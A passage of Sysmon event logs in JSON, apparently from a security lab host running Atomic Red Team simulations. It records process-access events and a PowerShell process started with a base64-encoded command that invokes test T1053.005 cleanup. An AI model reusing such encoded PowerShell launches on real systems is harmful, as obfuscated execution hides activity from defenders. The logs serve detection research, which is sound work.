06:55:21.370","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5959,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.370\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-001077810800}\r\nSourceProcessId: 3824\r\nSourceThreadId: 4796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nTargetProcessId: 1092\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.370","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001077810800}","SourceProcessId":"3824","SourceThreadId":"4796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","TargetProcessId":"1092","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5960,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.401\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nTargetProcessId: 1092\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.401","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","TargetProcessId":"1092","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5961,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.401\r\nProcessGuid: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nProcessId: 1092\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_qytlllx1.joo.ps1\r\nCreationUtcTime: 2020-08-01 06:55:21.401","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.401","ProcessGuid":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_qytlllx1.joo.ps1","CreationUtcTime":"2020-08-01 06:55:21.401","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5962,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.448\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nTargetProcessId: 1092\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.448","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","TargetProcessId":"1092","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5963,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.448\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 900\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nTargetProcessId: 1092\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.448","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"900","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","TargetProcessId":"1092","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5964,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.526\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.526","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5965,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.770\r\nProcessGuid: {E2A3D6B1-11D9-5F25-0000-001037C10800}\r\nProcessId: 932\r\nImage: C:\\Windows\\System32\\HOSTNAME.EXE\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Hostname APP\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: hostname.exe\r\nCommandLine: \"C:\\Windows\\system32\\HOSTNAME.EXE\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {E2A3D6B1-11D8-5F25-0000-0020C7800800}\r\nLogonId: 0x880C7\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E\r\nParentProcessGuid: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nParentProcessId: 1092\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADUAMwAuADAAMAA1ACIAIAAtAEMAbABlAGEAbgB1AHAA","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.770","ProcessGuid":"{E2A3D6B1-11D9-5F25-0000-001037C10800}","Image":"C:\\Windows\\System32\\HOSTNAME.EXE","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Hostname APP","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"hostname.exe","CommandLine":"\"C:\\Windows\\system32\\HOSTNAME.EXE\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{E2A3D6B1-11D8-5F25-0000-0020C7800800}","LogonId":"0x880c7","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E","ParentProcessGuid":"{E2A3D6B1-11D9-5F25-0000-0010B0A70800}","ParentProcessId":"1092","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADUAMwAuADAAMAA1ACIAIAAtAEMAbABlAGEAbgB1AHAA","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5966,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.760\r\nSourceProcessGUID: {E2A3D6B1-11D9-5F25-0000-0010B0A70800}\r\nSourceProcessId: 1092\r\nSourceThreadId: 4108\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {E2A3D6B1-11D9-5F25-0000-001037C10800}\r\nTargetProcessId: 932\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98ab2f4b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f54025(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f53cf6(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+98a0510b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f1488c(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f72d5b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+97f563c0(wow64)|C:\\Windows\\assembly\\N